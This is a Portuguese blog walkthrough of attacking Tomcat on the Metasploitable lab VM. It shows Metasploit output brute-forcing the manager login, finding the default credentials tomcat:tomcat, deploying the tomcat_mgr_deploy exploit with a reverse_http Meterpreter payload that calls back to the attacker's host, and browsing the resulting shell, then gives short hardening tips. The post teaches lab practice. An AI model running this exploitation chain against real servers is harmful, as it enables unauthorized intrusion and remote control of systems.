[-][192.168.0.108:8180 TOMCAT_MGR - [20/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [21/45] – Trying username:’manager’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [21/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [22/45] – Trying username:’manager’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [22/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [23/45] – Trying username:’manager’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [23/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [24/45] – Trying username:’manager’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [24/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [25/45] – Trying username:’role1′ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [25/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [26/45] – Trying username:’role1′ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [26/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [27/45] – Trying username:’role1′ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [27/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [28/45] – Trying username:’role1′ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [28/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [29/45] – Trying username:’role1′ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [29/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [30/45] – Trying username:’root’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [30/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [31/45] – Trying username:’root’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [31/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [32/45] – Trying username:’root’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [32/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [33/45] – Trying username:’root’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [33/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [34/45] – Trying username:’root’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [34/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [35/45] – Trying username:’both’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [35/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [36/45] – Trying username:’both’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [36/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [37/45] – Trying username:’both’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [37/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [38/45] – Trying username:’both’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [38/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [39/45] – Trying username:’both’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [39/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [40/45] – Trying username:’both’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [40/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][Scanned 1 of 1 hosts (100% complete)
[*][Auxiliary module execution completed


Opa! Se analizar bem essa saída podemos ver que com a wordlist padrão já encontramos uma combinação user:pass (tomcat:tomcat). Nem vamos precisar de wordlist nesse caso. Ele também encontrou que o diretório padrão é válido, logo, não precisamos testar outro. Então agora vamos procurar nosso exploit de verdade.


msf (tomcat_mgr_login) > search tomcat

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 00:00:00 UTC normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 00:00:00 UTC normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 00:00:00 UTC excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution

O exploit que nós vamos usar é o mgr_deploy, com um payload reverse_http. Vamos preencher com as informações que já conseguimos.


msf (tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf (tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:

Id Name
-- ----
0 Automatic
msf (tomcat_mgr_deploy) > set RHOST 192.168.0.108
RHOST => 192.168.0.108
msf (tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf (tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf (tomcat_mgr_deploy) > show payloads


Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline

msf (tomcat_mgr_deploy) > set PAYLOAD java/meterpreter/reverse_http
PAYLOAD => java/meterpreter/reverse_http
msf (tomcat_mgr_deploy) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf (tomcat_mgr_deploy) > exploit

[*][Started HTTP reverse handler on http://192.168.0.106:8443/
[*][Attempting to automatically select a target...
[*][Automatically selected target "Linux x86"
[*][Uploading 6465 bytes as D3YHKcK8TOful.war ...
[*][Executing /D3YHKcK8TOful/qh3Q6Qaf2NVdciS7ngfbkqIBa04HxV.jsp...
[*][Undeploying D3YHKcK8TOful ...
[*][192.168.0.108:51231 Request received for /INITJM...
Java: /INITJM
URL: "http://192.168.0.106:8443/FDnj_4IdkGPMI9c8doStx/\x00"
[*][Meterpreter session 2 opened (192.168.0.106:8443 -> 192.168.0.108:51231) at 2012-08-24 20:37:12 -0300
meterpreter >

Pronto! Conseguimos, estamos dentro, vamos rodar alguns comandos para confirmar.


meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > ifconfig

Interface 1
============
Name : lo – lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
Interface 2
============
Name : eth0 – eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.0.108
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe45:2ce8
IPv6 Netmask : ::

meterpreter > shell
Process 1 created.
Channel 1 created.

$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
$ whoami
tomcat55

$ ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

$ cd /tmp

$ pwd
/tmp

$ ls
4729.jsvc_up
cache37pgy7jar
cache37pgy8jar

$ halt
halt: Need to be root

E estamos mesmo dentro! Podemos ver pelo comando whoami que estamos no user tomcat55. Podemos passear e utilizar alguns comandos no sistema, mas não temos muitos privilégios. Pode-se notar isso no último comando que retornou “Need to be root”. Precisamos escalar privilégios e conseguir acesso root para brincar mais.

Mas essa parte fica para outro post, já que esse era apenas para conhecer a vulnerabilidade e os exploits.


Evitando o ataque


Opa descobri como atacar e por onde que se entra, mas e agora, como eu arrumo isso?

Bom, não se tem muita coisa a fazer nesse ponto, mas vamos a elas:

  • Mantenha sempre o Apache Tomcat atualizado
  • Não use senhas óbvias
  • Se possível mude o diretório para algo menos óbvio

Por hoje era isso! Já vimos 1 das falhas do Metasploitable, já já teremos mais.
Read More
Assinar: Postagens (Atom)
Subscribe to RSS Feed Follow me on Twitter!